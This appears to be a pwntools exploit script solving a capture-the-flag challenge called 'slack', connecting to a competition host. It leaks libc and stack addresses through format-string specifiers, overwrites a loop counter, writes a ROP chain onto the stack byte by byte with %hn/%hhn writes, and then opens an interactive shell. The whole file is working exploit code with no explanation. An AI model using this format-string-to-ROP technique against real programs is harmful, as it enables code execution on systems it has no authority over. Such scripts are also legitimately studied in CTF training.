ʕ·ᴥ·ʔ

from pwn import *

file = ELF("./slack")

if args.REMOTE:
    io = remote("challs.actf.co", 31500)
elif args.DOCKER:
    io = remote("localhost", 5000)
else:
    io = process("./slack")

def parseHex():
    io.recvuntil(b"You: ")
    line = io.recvline().decode().strip()
    return list(map(lambda n: int(n.strip("%"), 16), filter(lambda s: len(s) != 0, line.split("0x"))))

m32 = (1 << 32) - 1
m64 = (1 << 64) - 1

attack =  b"%9$p%52$p"
io.sendline(attack)
leak, stack = parseHex()
print(f"leak: {leak:x}")
base = leak - 0x2206a0
print(f"libc base: {base:x}")
print(f"stack: {stack:x}")
#retaddr = stack - 32 * 8
#print(f"retaddr: {retaddr:x}")
counter = stack - 46 * 8 + 3
print(f"counter addr: {counter:x}")

victim = counter & 0xFFFF
attack = (f"%{victim}c%25$hn").encode()
assert(len(attack) <= 13)
io.sendafter(b"Professional): ", attack.ljust(13, b"\x00"))
io.recvn(victim)

attack = (f"%128c%55$hhn").encode()
assert(len(attack) <= 13)
io.sendafter(b"Professional): ", attack.ljust(13, b"\x00"))

chain = [base + 0x2a3e5, base + 0x1d8698, base + 0x2f575, base + 0x50d60]
pointer = stack - 32 * 8

for gadget in chain:
    for byte in p64(gadget):
        victim = pointer & 0xFFFF
        attack = (f"%{victim}c%25$hn").encode()
        io.sendafter(b"Professional): ", attack.ljust(13, b"\x00"))
        io.recvn(victim)

        if byte == 0:
            io.sendafter(b"Professional): ", b"%55$hhn".ljust(13, b"\x00"))
        else:
            io.sendafter(b"Professional): ", (f"%{byte}c%55$hhn").encode().ljust(13, b"\x00"))

        pointer += 1

victim = counter & 0xFFFF
attack = (f"%{victim}c%25$hn").encode()
assert(len(attack) <= 13)
io.sendafter(b"Professional): ", attack.ljust(13, b"\x00"))
io.recvn(victim)

attack = (f"%55$hhn").encode()
assert(len(attack) <= 13)
io.sendafter(b"Professional): ", attack.ljust(13, b"\x00"))

io.interactive()